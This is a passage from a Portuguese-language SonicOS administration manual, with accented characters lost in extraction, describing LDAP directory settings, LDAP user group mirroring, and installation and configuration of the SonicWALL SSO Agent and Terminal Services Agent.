ou=Users,ou=Sales,dc=myDom,dc=com). O ltimo formato ser necessrio se o DN
no estiver de acordo com as regras de formatao normais, conforme esse exemplo.
No Active Directory a URL correspondente para o nome distinto para uma rvore
exibido na guia objeto nas propriedades do continer na parte superior da rvore.

Nota O AD tem alguns recipientes internos que no so compatveis (por ex., o DN para
o recipiente de Usurios de nvel superior est formatado como cn=Users,dc=,
usando cn em vez de ou), mas o SonicOS conhece e lida com eles, para que
eles possam ser inseridos no formato URL mais simples.
A ordem no fundamental, mas j que eles so pesquisados na ordem fornecida,

mais eficiente colocar as rvores mais utilizadas primeiro em cada lista. Se
recomendaes entre vrios servidores do LDAP precisarem ser utilizadas, ento as
rvores so mais bem ordenadas com elas no servidor primrio primeiro e o restante
na mesma ordem que sero consultadas.
Nota Ao trabalhar com o AD, para determinar o local de um usurio no diretrio para o
campo rvore do usurio para login no servidor, o diretrio pode ser pesquisado
manualmente no miniaplicativo do painel de controle Usurios e Configuraes do
Active Directory no servidor. Como alternativa, um utilitrio de pesquisa de diretrio
como o queryad.vbs no Kit de Recursos do Windows NT/2000/XP pode ser
executado em qualquer PC no domnio.
Configurar automaticamente Isso faz com que o SonicOS configure

automaticamente os campos rvores que contm usurios e rvores que contm
grupos de usurios pela verificao por meio do diretrio/diretrios que procuram
todas as rvores que contm os objetos de usurio. Para usar a configurao
automtica, primeiro insira um valor no campo rvore do usurio para login no
servidor (a menos que o login annimo seja definido) e, em seguida, clique no boto
Configurar automaticamente para exibir a caixa de dilogo a seguir:
Na caixa de dilogo Configurar automaticamente, digite o domnio desejado no campo

Domnio a ser pesquisado.
Selecione uma das seguintes aes:
Anexar s rvores existentes Esta seleo anexar as rvores recentemente
localizadas configurao atual.
Substituir rvores existentes Esta seleo ser iniciada do zero, removendo
primeiro todas as rvores atualmente configuradas.
O processo de configurao automtica tambm pode localizar rvores que no sejam
necessrias para o login do usurio. possvel remover manualmente essas entradas.

Se estiver utilizando vrios servidores do LDAP/AD com recomendaes, este processo
pode ser repetido para cada uma delas, substituindo o valor Domnio a ser pesquisado
de forma adequada e selecionando Anexar s rvores existentes em cada execuo
posterior.
Etapa 16 Na guia Recomendaes, configure os campos a seguir:
Permitir recomendaes Selecione esta opo sempre que as informaes do

usurio estejam localizadas em um servidor do LDAP que no seja o servidor primrio
configurado.
Permitir referncias de continuao durante a autenticao do usurio
Selecione esta opo sempre que as rvores de diretrio individuais tenham sido
configuradas manualmente para vrios servidores do LDAP.
Permitir referncias de continuao durante a configurao automtica do
diretrio Selecione esta opo para permitir que as rvores sejam lidas a partir de
vrios servidores do LDAP em uma nica operao.
Permitir referncias de continuao em pesquisas de domnios Selecione esta
opo ao usar o login nico com usurios em vrios subdomnios com servidores do
LDAP separados.
Etapa 17 Na guia Usurios do LDAP, configure os campos a seguir:

Permitir somente usurios listados localmente Requer que os usurios do LDAP
tambm estejam presentes no banco de dados de usurios locais do SonicOS para
permisses de logins.
A associao a grupos de usurios pode ser definida localmente pela duplicao
de nomes de usurio do LDAP Permite que a associao (e privilgios) de grupos
sejam determinados pela interseo das configuraes de usurios locais e de
usurios do LDAP.
Grupo de usurios do LDAP padro Um grupo padro no SonicOS ao qual os
usurios do LDAP pertencero, alm das associaes a grupos configuradas no
servidor do LDAP.
Importar usurios possvel clicar nesse boto para configurar os usurios locais
no SonicOS, recuperando os nomes de usurios do seu servidor do LDAP. O boto
Importar usurios inicia uma caixa de dilogo que contm a lista de nomes de usurio
disponveis para importao.
Na caixa de dilogo Importar usurios do LDAP, selecione a caixa de seleo para

cada usurio que voc deseja importar para o SonicOS e, em seguida, clique em
Salvar selecionados.
A lista de usurios lidos do servidor do LDAP pode ser bastante longa e voc pode no
desejar importar todos eles. Um boto Remover da lista fornecido, juntamente com
vrios mtodos de seleo de usurios indesejados. possvel usar essas opes
para reduzir a lista a um tamanho gerencivel e ento selecionar os usurios que sero
importados.
Ter usurios no SonicOS com o mesmo nome de usurios do LDAP existentes permite
que os privilgios de usurio do SonicWALL sejam concedidos aps a autenticao do
LDAP.

Importar grupos de usurios possvel clicar nesse boto para configurar os
grupos de usurios no SonicOS, recuperando os grupos de usurios do seu servidor
do LDAP. O boto Importar grupos de usurios inicia uma caixa de dilogo que
contm a lista de nomes de grupos de usurios disponveis para importao ao firewall.
Na caixa de dilogo Importar grupos de usurios do LDAP, selecione a caixa de

seleo para cada grupo que voc deseja importar para o SonicOS e, em seguida,
clique em Salvar selecionados.
Ter grupos de usurios no SonicOS com o mesmo nome dos grupos de usurios do
LDAP/AD existentes permite que os privilgios e associaes a grupos do SonicWALL
sejam concedidos aps a autenticao do LDAP.
Como alternativa, possvel criar manualmente grupos de usurios no servidor do
LDAP/AD com os mesmos nomes de grupos internos do SonicWALL (como Servios
de convidados, Desvios de Filtragem de Contedo e Administradores limitados) e
atribuir usurios a esses grupos no diretrio. Isso tambm permite que as associaes
a grupos do SonicWALL sejam concedidas aps a autenticao LDAP.
O firewall pode recuperar associaes a grupos de forma eficiente no caso do Active
Directory, utilizando sua caracterstica exclusiva de retornar um atributo memberOf
para um usurio.
Etapa 18 Na guia Retransmisso LDAP, configure os campos a seguir:

O recurso RADIUS para Retransmisso LDAP projetado para ser utilizado em uma
topologia em que exista um site central com um servidor do LDAP/AD e um SonicWALL
central com sites de satlite remotos conectados a ele por meio de firewalls de baixo nvel
que possam no oferecer suporte ao LDAP. Nesse caso, o SonicWALL central pode operar
como um servidor do RADIUS para os SonicWALLs remotos, atuando como um gateway
entre o RADIUS e o LDAP e retransmitindo solicitaes de autenticao deles para o
servidor do LDAP.
Habilitar RADIUS para Retransmisso LDAP Ativa este recurso.
Permitir que clientes RADIUS se conectem via Marque as caixas de seleo
relevantes para que as regras de poltica sejam adicionadas e permitir as solicitaes
de entrada do RADIUS de acordo.
Segredo compartilhado do RADIUS Este um segredo compartilhado comum a
todos os SonicWALLs remotos.
Grupos de usurios para usurios de VPN legados Define o grupo de usurios
que corresponde aos privilgios legados do Acesso a VPNs. Quando um usurio
deste grupo de usurios autenticado, o SonicWALL remoto ser notificado para
conceder ao usurio os privilgios relevantes.
Grupos de usurios para usurios clientes de VPN legados Define o grupo de
usurios que corresponde aos privilgios legados do Acesso do cliente da VPN sem
XAUTH. Quando um usurio deste grupo de usurios autenticado, o SonicWALL
remoto ser notificado para conceder ao usurio os privilgios relevantes.
Grupos de usurios para usurios de L2TP legados Define o grupo de usurios
que corresponde aos privilgios legados do Acesso do cliente de L2TP VPN. Quando
um usurio deste grupo de usurios autenticado, o SonicWALL remoto ser
notificado para conceder ao usurio os privilgios relevantes.
Grupos de usurios para usurios legados com acesso Internet Define o grupo
de usurios que corresponde aos privilgios legados de Permitir acesso Internet
(quando o acesso for restrito). Quando um usurio deste grupo de usurios
autenticado, o SonicWALL remoto ser notificado para conceder ao usurio os
privilgios relevantes.
Nota Os privilgios de recursos de gerenciamento limitado e Filtros de desvio so retornados

com base na associao a grupos de usurios denominados Desvios de Filtragem de
Contedo e Administradores limitados elas no so configurveis.
Etapa 19 Selecione a guia Testar para testar as configuraes do LDAP definidas:
A pgina Testar configuraes do LDAP permite que as configuraes do LDAP

definidas sejam testadas, pela tentativa de autenticao com credenciais especificadas de
usurio e senha. Todas as associaes a grupos de usurios e/ou endereo IP com
moldura configurados no servidor do LDAP/AD para o usurio sero exibidos.

Espelhamento do grupo de usurios do LDAP
O Espelhamento do grupo de usurios do LDAP fornece a duplicao automtica das
configuraes do Grupo de usurios do LDAP a partir de um servidor do LDAP para um
Dispositivo de Segurana SonicWALL. Os administradores podem gerenciar de Grupos de
usurios do LDAP exclusivamente no servidor do LDAP; no necessrio duplicar
manualmente as configuraes no Dispositivo de Segurana SonicWALL. As configuraes do
grupo de usurios so periodicamente lidas do servidor do LDAP e copiadas para o Dispositivo
de Segurana SonicWALL.
Os nomes do Grupo de usurios do LDAP que so copiados para o Dispositivo de Segurana
incluem o nome de domnio no formato: nome@domnio.com. Isso garante que os nomes do
grupo de usurios de vrios domnios sejam exclusivos.
Os seguintes recursos e restries se aplicam a Grupos de usurios do LDAP espelhados:
Os administradores podem excluir os Grupos de usurios do LDAP somente no servidor
do LDAP. Eles no podem excluir os Grupos de usurios do LDAP espelhados no
Dispositivo de Segurana SonicWALL. Quando um grupo de usurios excludo do
servidor do LDAP, seu grupo espelhado no Dispositivo de Segurana SonicWALL
tambm automaticamente excludo.
Os administradores podem editar os nomes do Grupo de usurios do LDAP (e suas
respectivas caixas de comentrio) somente no servidor do LDAP. Eles no podem editar o
nome do Grupo de usurios do LDAP espelhado ou sua caixa de comentrio no Dispositivo
de Segurana SonicWALL. A caixa de comentrio exibe Espelhamento do LDAP no
Dispositivo de Segurana SonicWALL.
Os administradores podem adicionar usurios como membros a um Grupo de usurios do
LDAP no Dispositivo de Segurana SonicWALL.
Os administradores no podem adicionar grupos a outros grupos no Dispositivo de
Segurana SonicWALL. Os grupos de usurios padro s podem ser configurados no
servidor do LDAP.
Os administradores podem configurar itens como VPNs, SSL VPN, polticas do CFS e
polticas do ISP para os Grupos de usurios do LDAP no Dispositivo de Segurana
SonicWALL, quando eles forem configurveis nas pginas de configurao como Firewall
> Regras de acesso ou Firewall > Regras de aplicativo.
Nota Os Grupos de usurios do LDAP no sero excludos se eles forem configurados em

quaisquer Regras de acesso, Regras de aplicativo ou polticas.
Ao desativar o Espelhamento do Grupo de usurios do LDAP, os grupos de usurios

espelhados no Dispositivo de Segurana SonicWALL no sero excludos. Eles sero
alterados, para que eles possam ser excludos manualmente por um administrador. Os
grupos locais de usurios espelhados podem ser habilitados novamente se eles no
tiverem sido excludos manualmente.
Quando o sistema cria um grupo espelhado no Dispositivo de Segurana SonicWALL e o
nome do grupo espelhado corresponder ao nome de um grupo local (no espelhado) j
existente e criado pelo usurio, o grupo local no ser substitudo. As associaes a
grupos locais so atualizadas para refletir os aninhamentos do grupo que esto
configurados no servidor do LDAP.
Se o sistema localizar um grupo de usurios no servidor do LDAP com um nome que seja
o mesmo que um dos grupos de usurios padro no Dispositivo de Segurana SonicWALL,
nenhum grupo de usurios espelhado ser criado no Dispositivo de Segurana
SonicWALL. As associaes no grupo de usurios padro so atualizadas para refletir os
aninhamentos do grupo que esto configurados no servidor do LDAP.

Para os grupos criados anteriormente ao SonicOS 6.2, se existir um grupo de usurios
locais no Dispositivo de Segurana SonicWALL com somente um nome simples (nenhum
domnio) e esse nome corresponder ao nome de um grupo de usurios no servidor do
LDAP (que inclui um domnio), um novo grupo de usurios locais ser criado no Dispositivo
de Segurana SonicWALL e receber o mesmo domnio que o grupo de usurios
correspondente no servidor do LDAP. O grupo de usurios locais original mantido sem
nenhum domnio. Os usurios do grupo original recebem as associaes no grupo do
LDAP, no novo grupo espelhado local e no grupo local original (sem nenhum domnio).
Associao a grupos do LDAP por Unidade Organizacional

O recurso Associao a grupos do LDAP por unidade organizacional oferece a capacidade de
definir polticas e regras do LDAP para usurios localizados em determinadas Unidades
Organizacionais (OUs) no servidor do LDAP.
Para definir uma associao de usurio por local do LDAP:
Etapa 1 No Dispositivo de Segurana SonicWall, v at Usurios > Grupos locais.

Etapa 2 Marque a caixa de seleo de As associaes so definidas por local do usurio no
diretrio do LDAP.
Etapa 3 Selecione uma das seguintes opes de Para usurios:
no ou abaixo do local definido
ou
no local definido.
Quando um usurio efetua login, se os grupos de usurios estiver definidos para conceder
associaes por local do LDAP, o usurio torna-se um membro de todos os grupos que
corresponderem a seu local do LDAP.
Os administradores podem definir qualquer grupo local, incluindo grupos locais padro (exceto
o grupo Todos e o grupo Usurios confiveis), como um grupo com membros que so definidos
por seu local na rvore do diretrio do LDAP.

Quando um usurio for membro de todos os grupos locais que esto configurados para o local
do LDAP:
O local desses grupos locais na rvore do LDAP descoberto.
O local dos grupos locais do usurio verificado em relao a todos os outros grupos
locais. Se algum outro grupo tiver o mesmo local do LDAP que o local dos grupos de
associao do usurio, o usurio ser automaticamente definido como membro desses
grupos para essa sesso de login.
Quando um usurio tentar efetuar login, seja com xito ou com falha, o nome distinto do
usurio ser registrado no log de eventos. Isso ajuda a solucionar o problema em caso de falha
em um usurio obter as associaes aos grupos esperados.
Configurandoo Login nico

Configurar o SSO um processo que inclui a instalao e configurao do Agente SSO do
SonicWALL e/ou o Agente de servios de terminal do SonicWALL (TSA) e a configurao de
um firewall com o SonicOS para usar o agente SSO ou TSA. Para obter uma apresentao do
SSO do SonicWALL, consulte Viso geral do Login nico (SSO) na pgina 957. As sees a
seguir descrevem como configurar o SSO:
Instalando o Agente SSO do SonicWALL na pgina 1014
Instalando o Agente de Servios de Terminal do SonicWALL na pgina 1017
Configurando o Agente SSO do SonicWALL na pgina 1019
Configurando o Dispositivo de Segurana de Rede Dell SonicWALL na pgina 1024
Editando dispositivos no Agente SSO do SonicWALL na pgina 1025
Excluindo dispositivos do Agente SSO do SonicWALL na pgina 1025
Modificando servios no Agente SSO do SonicWALL na pgina 1026
Configurando o Agente de servios de terminal do SonicWALL na pgina 1026
Adicionando um Dispositivo de Segurana de Rede Dell SonicWALL s configuraes
do SonicWALL TSA na pgina 1026
Criando um relatrio de resoluo de problemas no SonicWALL TSA na pgina 1028
Exibindo o status e verso do SonicWALL TSA na pgina 1029
Configurando o SonicOS para utilizar o Agente SSO do SonicWALL na pgina 1030
Configurao avanada do LDAP na pgina 1046
Ajustando configuraes avanadas do Login nico na pgina 1055
Viso geral na pgina 1055
Sobre as Configuraes avanadas na pgina 1055
Exibindo estatsticas e dicas de ferramentas do SSO com o mouse sobre os itens na
pgina 1056
Usando as estatsticas de Login nico no TSR na pgina 1058
Examinando o agente na pgina 1059
Solues na pgina 1059
Configurando as regras de acesso do firewall na pgina 1059
Regras geradas automaticamente para o SSO do SonicWALL na pgina 1060
Acomodando usurios do Mac e Linux na pgina 1060
Permitindo pings do ICMP a partir de um servidor do terminal na pgina 1062
Sobre as regras de acesso do firewall na pgina 1062

Gerenciando o SonicOS com o login de HTTP a partir de um servidor do terminal na
pgina 1063
Exibindo e gerenciando sesses de usurio no SSO na pgina 1064
Efetuando logout de usurios no SSO na pgina 1064
Definindo configuraes adicionais de usurios do SSO na pgina 1064
Exibindo as mensagens do LDAP e SSO com o Monitor de pacotes na pgina 1065
Instalando o Agente SSO do SonicWALL

O Agente SSO do SonicWALL faz parte do SonicWALL Directory Connector. Ele deve ser
instalado em pelo menos um e at oito, estaes de trabalho ou servidores no domnio do
Windows que tenham acesso ao servidor do Active Directory com VPN ou IP. O agente SSO
do SonicWALL deve ter acesso ao seu firewall.
Para instalar o agente SSO do SonicWALL, siga as etapas a seguir:
Etapa 1 Localize o arquivo executvel do SonicWALL Directory Connector e clique duas vezes nele.
Pode demorar vrios segundos para que o Assistente de Instalao seja preparado para a
instalao.
Etapa 2 Na pgina inicial, clique em Avanar para continuar.
Etapa 3 O Contrato de Licena exibido. Selecione Aceito os termos do contrato de licena e clique
em Avanar para continuar.

Etapa 4 Na pgina Informaes do cliente, digite seu nome no campo Nome de usurio e o nome de
sua organizao no campo Organizao. Selecione esta opo para instalar o aplicativo para
Qualquer pessoa que utilize este computador (todos os usurios) ou Somente para mim.
Clique em Avanar para continuar.
Etapa 5 Selecione a pasta de destino. Para usar a pasta padro, C:\Program Files\SonicWALL\DCON,
clique em Avanar. Para especificar um local personalizado, clique em Procurar, selecione a
pasta e clique em Avanar.

Etapa 6 Na pgina Configurao personalizada, o cone de instalao exibido por padro ao
lado do recurso do agente SSO do SonicWALL. Clique em Avanar.
Etapa 7 Clique em Instalar para instalar o agente SSO.

Etapa 8 Para configurar uma conta de servio comum que o agente SSO utilizar para efetuar login em
um domnio do Windows especificado, digite o nome de usurio de uma conta com privilgios
administrativos no campo Nome de usurio, a senha da conta no campo Senha e o nome de
domnio da conta no campo Nome de domnio. Clique em Avanar.
Nota Esta seo pode ser configurada posteriormente. Para ignorar esta etapa e configur-la
mais tarde,
clique em Ignorar.
Etapa 9 Insira o endereo IP de seu firewall no campo IP do Dispositivo SonicWALL. Insira o nmero
da porta para o mesmo dispositivo no campo Porta do Dispositivo SonicWALL. Insira uma
chave compartilhada (um nmero hexadecimal de 1 a 16 dgitos) no campo Chave
compartilhada. Clique em Avanar para continuar.

Nota Estas informaes podem ser configuradas posteriormente. Para ignorar esta etapa e
configur-la mais tarde, deixe os campos em branco e clique em Avanar.
O Agente SSO do SonicWALL instalado. A barra de status exibida.

Etapa 10 Quando a instalao estiver concluda, opcionalmente, marque a caixa Iniciar SonicWALL
Directory Connector para iniciar o SonicWALL Directory Connector e clique em Finalizar.
Se voc marcou a caixa Iniciar o SonicWALL Directory Connector, o SonicWALL Directory
Connector ser exibido.
Instalando o Agente de Servios de Terminal do SonicWALL

Instale o SonicWALL TSA em um ou mais servidores de terminal em sua rede dentro do
domnio do Windows. O SonicWALL TSA deve ter acesso ao seu dispositivo de segurana
SonicWALL e o dispositivo deve ter acesso ao TSA. Se voc tiver um software de firewall em
execuo no servidor de terminal, ser necessrio abrir o nmero da porta UDP para as
mensagens de entrada do dispositivo.

O SonicWALL TSA est disponvel para download gratuitamente no MySonicWALL. Para
instalar o SonicWALL TSA, siga as etapas a seguir:
Etapa 1 Em um sistema do Windows Terminal Server, faa o download de um dos programas de

instalao a seguir, dependendo do seu computador:
SonicWALL TSAInstaller32.msi (32 bits, verso 3.0.28.1001 ou superior)
SonicWALL TSAInstaller64.msi (64 bits, verso 3.0.28.1001 ou superior)
possvel encontr-los em http://www.mysonicwall.com
Etapa 2 Clique duas vezes no programa de instalao para iniciar a instalao.
Etapa 3 Na pgina inicial, clique em Avanar para continuar.
Etapa 4 O Contrato de Licena exibido. Selecione Concordo e clique em Avanar para continuar.
Etapa 5 Na janela Selecionar pasta de instalao, selecione a pasta de destino. Para usar a pasta
padro, C:\Program Files\SonicWALL\SonicWALL Terminal Services Agent\, clique em
Avanar. Para especificar um local personalizado, clique em Procurar, selecione a pasta e
clique em Avanar.
Etapa 6 Na janela Confirmar instalao, clique em Avanar para iniciar a instalao.
Etapa 7 Aguarde enquanto o Agente de servios de terminal do SonicWALL instalado. A barra de

progresso indica o status.
Etapa 8 Quando a instalao for concluda, clique em Fechar para sair do instalador.

Etapa 9 necessrio reiniciar o sistema antes de iniciar o Agente de servios de terminal do
SonicWALL. Para reiniciar imediatamente, clique em Sim na caixa de dilogo. Para reiniciar
mais tarde, clique em No.
Configurando o Agente SSO do SonicWALL

O Agente SSO do SonicWALL se comunica com as estaes de trabalho com o uso do NetAPI
ou WMI, que fornecem informaes sobre os usurios que esto conectados em uma estao
de trabalho, incluindo os usurios do domnio, os usurios locais e os servios do Windows. O
WMI pr-instalado no Windows Server 2003, Windows XP, Windows ME e Windows 2000.
Para outras verses do Windows, acesse www.microsoft.com para fazer o download do WMI.
Verifique se o NetAPI ou WMI est instalado antes de configurar o Agente SSO do SonicWALL.
O .NET Framework 2.0 deve estar instalado antes de configurar o Agente SSO do SonicWALL.
O .NET Framework pode ser baixado no website da Microsoft em www.microsoft.com.
Para configurar as propriedades de comunicao do Agente SSO do SonicWALL, realize as
seguintes tarefas:
Etapa 1 Inicie a Ferramenta de configurao do SonicWALL clicando duas vezes no atalho da rea de
trabalho ou indo at Iniciar > Todos os programas > SonicWALL > SonicWALL Directory
Connector > Ferramenta de configurao do SonicWALL.

Nota Se o endereo IP de um firewall padro no tiver sido configurado ou se ele tiver sido
configurado incorretamente, uma pop-up ser exibida. Clique em Sim para usar o endereo
IP padro (192.168.168.168) ou clique em No para usar a configurao atual.
Se voc clicou em Sim, a mensagem Configurao antiga restaurada com xito ser
exibida. Clique em OK.
Se voc clicou em No ou se tiver clicado em Sim, mas a configurao padro estiver

incorreta, a mensagem O servio do Agente SSO do SonicWALL no est em execuo.
A mensagem Verifique a configurao e inicie o servio. ser exibida. Clique em OK.
Se a mensagem O servio do Agente SSO do SonicWALL no est em execuo. A

mensagem Verifique a configurao e inicie o servio ser exibida e o servio do Agente
SSO ser desabilitado por padro. Para ativar o servio, expanda a Ferramenta de
configurao do SonicWALL Directory Connector no painel de navegao esquerda, clicando
no cone +, realce Agente SSO do SonicWALL abaixo dele e, em seguida, clique no boto
.

Etapa 2 No painel de navegao esquerda, expanda a Ferramenta de configurao do SonicWALL
Directory Connector clicando no cone +. Clique com o boto direito em Agente SSO do
SonicWALL e selecione Propriedades.
Etapa 3 No menu suspenso Nvel de registro em log, selecione o nvel de eventos que sero
registrados no Log de Eventos do Windows. O nvel de registro em log padro 1. Selecione
um dos seguintes nveis:
Nvel de registro em log 0 Somente os eventos crticos so registrados.
Nvel de registro em log 1 Os eventos crticos e significativamente graves so
registrados.
Nvel de registro em log 2 Todas as solicitaes do dispositivo so registradas,
usando o nvel de depurao de gravidade.
Nota Quando o Nvel de registro em log 2 estiver marcado, o servio do Agente SSO ser
encerrado se o log de eventos do Windows atingir sua capacidade mxima.

Etapa 4 No campo Atualizar hora, insira a frequncia, em segundos, que o Agente SSO atualizar o
registro em log do usurio no status. O padro 60 segundos.

Etapa 5 No menu suspenso Consultar origem, selecione o protocolo que o Agente SSO utilizar para
se comunicar com as estaes de trabalho, NETAPI ou WMI.
Nota O NetAPI fornecer um desempenho mais rpido, embora provavelmente um pouco menos
preciso. O WMI fornecer um desempenho mais lento, embora provavelmente mais
preciso. Com o NetAPI, o Windows informa o ltimo login na estao de trabalho caso o
usurio ainda esteja conectado ou no. Isso significa que depois que um usurio efetua
logout de seu computador, o dispositivo ainda mostrar o usurio como conectado quando
o NetAPI utilizado. Se outro usurio efetua login no mesmo computador, ento nesse
ponto, o usurio anterior desconectado do SonicWALL.
O WMI pr-instalado no Windows Server 2003, Windows XP, Windows ME e Windows 2000.
O NetAPI e o WMI podem ser manualmente baixados e instalados. Eles fornecem informaes
sobre os usurios que esto conectados em uma estao de trabalho, incluindo os usurios
do domnio, os usurios locais e os servios do Windows.

Etapa 6 No campo Arquivo de configurao, digite o caminho do arquivo de configurao. O caminho
de padro C:\Program Files\SonicWALL\DCON\SSO\CIAConfig.xml.

Configurando o Dispositivo de Segurana de Rede Dell SonicWALL
Utilize estas instrues para adicionar manualmente um firewall, caso no tenha adicionado
um durante a instalao, ou para adicionar firewalls adicionais.
Para adicionar um firewall, siga as etapas a seguir:
Etapa 1 Inicie o Configurador do Agente SSO do SonicWALL.

Etapa 2 Expanda as rvores do SonicWALL Directory Connector e do Agente SSO do SonicWALL na
coluna esquerda, clicando no boto +. Clique com o boto direito em Dispositivo
SonicWALL e selecione Adicionar.
Etapa 3 Insira o endereo IP do dispositivo de seu Dispositivo de Segurana de Rede Dell SonicWALL
no campo IP do dispositivo. Insira a porta para o mesmo dispositivo no campo Porta do
Dispositivo. A porta padro 2258. Fornea um nome amigvel ao seu dispositivo no campo
Nome amigvel. Insira uma chave compartilhada no campo Chave compartilhada ou clique
em Gerar chave para gerar uma chave compartilhada. Ao concluir, clique em OK.
Seu dispositivo ser exibido no painel de navegao esquerda abaixo da rvore Dispositivo
Dell SonicWALL.
Editando dispositivos no Agente SSO do SonicWALL
possvel editar todas as configuraes de firewalls adicionadas anteriormente no Agente

SSO do SonicWALL, incluindo o endereo IP, nmero da porta, nome amigvel e chave
compartilhada. Para editar um firewall no Agente SSO do SonicWALL, selecione o dispositivo
no painel de navegao esquerda e clique no cone de edio , localizado acima do
painel de navegao esquerda. Tambm possvel clicar na guia Editar, localizada na parte
inferior da janela do lado direito.
Excluindo dispositivos do Agente SSO do SonicWALL
Para excluir um firewall adicionado anteriormente no Agente SSO do SonicWALL, selecione o

dispositivo no painel de navegao esquerda e clique no cone de excluso , localizado
acima do painel de navegao esquerda.

Modificando servios no Agente SSO do SonicWALL
possvel iniciar, parar e pausar os servios do Agente SSO do SonicWALL nos firewalls. Para
pausar os servios de um dispositivo, selecione o dispositivo no painel de navegao
esquerda e clique no boto de pausa . Para parar os servios de um dispositivo, selecione
o dispositivo no painel de navegao esquerda e clique no boto de interrupo . Para
reiniciar os servios, clique no boto de inicializao .
Nota possvel que voc seja solicitado a reiniciar os servios depois de fazer alteraes de
configurao em um firewall no Agente SSO do SonicWALL. Para reiniciar os servios,
pressione o boto de interrupo e, em seguida, o boto de inicializao.
Configurando o Agente de servios de terminal do SonicWALL

Depois de instalar o SonicWALL TSA e reiniciar seu sistema do Windows Server, possvel
clicar duas vezes no cone da rea de trabalho do SonicWALL TSA criado pelo instalador para
inici-lo para configurao, para gerar um relatrio de resoluo de problemas (TSR) ou para
exibir as informaes de status e verso.

Adicionando um Dispositivo de Segurana de Rede Dell SonicWALL s configuraes do
SonicWALL TSA na pgina 1026
Criando um relatrio de resoluo de problemas no SonicWALL TSA na pgina 1028
Exibindo o status e verso do SonicWALL TSA na pgina 1029
Adicionando um Dispositivo de Segurana de Rede Dell SonicWALL s configuraes do SonicWALL TSA
Realize as etapas a seguir para adicionar um dispositivo de segurana de rede Dell

SonicWALL ao SonicWALL TSA:
Etapa 1 Clique duas vezes no cone da rea de trabalho do SonicWALL TSA.

Etapa 2 A janela do Agente de servios de terminal do SonicWALL ser exibida. Na guia
Configuraes, insira o endereo IP do firewall no campo IP do dispositivo.
Etapa 3 Insira a porta de comunicao no campo Porta do dispositivo. A porta padro 2259, mas
uma porta personalizada pode ser utilizada em seu lugar. Essa porta deve ser aberta no
sistema do Windows Server.
Etapa 4 Insira a chave de criptografia no campo Segredo compartilhado. Selecione a caixa de
seleo Exibir segredo para exibir os caracteres e verificar se eles esto corretos. O mesmo
segredo compartilhado deve ser configurado no firewall.
Etapa 5 Na lista suspensa Tempo limite, selecione o nmero de segundos que o agente aguardar por
uma resposta do dispositivo antes de realizar uma nova tentativa de notificao. O intervalo
de 5 a 10 segundos e o padro 5 segundos.
Etapa 6 Na lista suspensa Repeties, selecione o nmero de vezes que o agente realizar uma
tentativa de enviar uma notificao para o dispositivo quando ele no receber uma resposta.
O intervalo de repeties de 3 a 10 e o padro 5.
Etapa 7 Para habilitar detalhes completos em mensagens de log, selecione a caixa de seleo
Habilitar log detalhado. Realize esta etapa somente para fornecer informaes adicionais e
detalhadas em um relatrio de resoluo de problemas. Evite deixar esta opo habilitada em
outros momentos, pois ela pode afetar o desempenho.
Etapa 8 Clique em Aplicar. Uma caixa de dilogo indica que o servio SonicWALL TSA foi reiniciado
com as novas configuraes.

Criando um relatrio de resoluo de problemas no SonicWALL TSA
possvel criar um relatrio de resoluo de problemas (TSR) que contm todas as

mensagens de log atuais e informaes sobre o agente, driver e as configuraes do sistema
para serem examinadas ou enviadas ao Suporte Tcnico SonicWALL para assistncia.
Realize as etapas a seguir para criar um TSR para o SonicWALL TSA:

Etapa 2 A janela do Agente de servios de terminal do SonicWALL ser exibida. Clique na guia
Relatrios.
Etapa 3 Para gerar o TSR e envi-lo automaticamente por e-mail ao Suporte Tcnico SonicWALL,
clique em Enviar.
Etapa 4 Para gerar o TSR e examin-lo em seu editor de texto padro, clique em Exibir.
Etapa 5 Para gerar o TSR e salv-lo como um arquivo de texto, clique em Salvar como.
Etapa 6 Ao concluir, clique em Fechar.

Exibindo o status e verso do SonicWALL TSA
Para exibir o status atual do servio do SonicWALL TSA em seu sistema do Windows Server
ou para exibir o nmero da verso do SonicWALL TSA, realize as seguintes etapas:

Etapa 2 A janela do Agente de servios de terminal do SonicWALL ser exibida. Clique na guia Sobre.
Etapa 3 Clique em Fechar.

Configurando o SonicOS para utilizar o Agente SSO do SonicWALL
Siga o procedimento a seguir para configurar seu firewall para utilizar o Agente SSO do
SonicWALL:
Etapa 1 V at Usurios > Configuraes.

Etapa 2 Na seo Mtodo(s) de Login nico, selecione Agente SSO do SonicWALL. Utilize esta
opo para adicionar e configurar um TSA, bem como um Agente SSO para o mtodo SSO.
Etapa 3 Clique em Configurar SSO. A pgina de Configurao da autenticao SSO exibida. Clique
na guia Agentes de SSO na parte superior esquerda e na guia Agentes de SSO em
Configuraes do agente de autenticao para exibir os Agentes de SSO configurados. O LED

verde ao lado do endereo IP do agente indica que o agente est atualmente sendo executado.
Um LED vermelho indicaria que o agente est inativo. Um LED cinza mostra que o agente est
desabilitado. Os LEDs so atualizados dinamicamente com o uso do AJAX.
Etapa 4 Clique no boto Adicionar para criar um agente. A pgina atualizada para exibir uma nova
linha na tabela na parte superior e duas novas guias (Configuraes e Avanadas) na parte
inferior da pgina.
Etapa 5 Insira as seguintes informaes na guia Configuraes:

Para a guia Nome do host ou endereo IP, digite o nome ou endereo IP da estao de
trabalho no qual Agente SSO do SonicWALL est instalado.
Ao digitar valores nos campos, a linha na parte superior atualizada em vermelho para
destacar as novas informaes.
Em Porta, insira o nmero da porta que o Agente SSO do SonicWALL est utilizando para
se comunicar com o dispositivo. A porta padro 2258. Observe que os agentes em
endereos IP diferentes podem ter o mesmo nmero de porta.

Em Chave compartilhada, insira a chave compartilhada criada ou gerada no Agente SSO

do SonicWALL. A chave compartilhada deve ter uma correspondncia exata. Insira
novamente a chave compartilhada no campo Confirmar chave compartilhada.
Em Tempo limite (segundos), insira um nmero de segundos antes da tentativa de
autenticao expirar. Este campo preenchido automaticamente com o padro de 10
segundos.
Em Repeties, insira o nmero de tentativas de autenticao. O padro 6.
Etapa 6 Clique no cone Avanadas e, em seguida, insira as seguintes informaes:
Em Mximo de solicitaes a serem enviadas por vez, insira o nmero mximo de
solicitaes a serem enviadas do dispositivo ao agente de uma s vez. O padro 32.
O agente processa vrias solicitaes ao mesmo tempo, gerando um segmento separado
no PC do agente para lidar com cada uma delas. Enviar muitas solicitaes ao mesmo
tempo pode sobrecarregar o PC. Por outro lado, se o nmero de solicitaes simultneas
enviadas do dispositivo for muito baixo, algumas solicitaes tero que aguardar,
possivelmente ocasionando um estouro no buffer de anel. Muitas solicitaes em espera
podem causar tempos de resposta lentos na autenticao de Login nico. Para obter mais
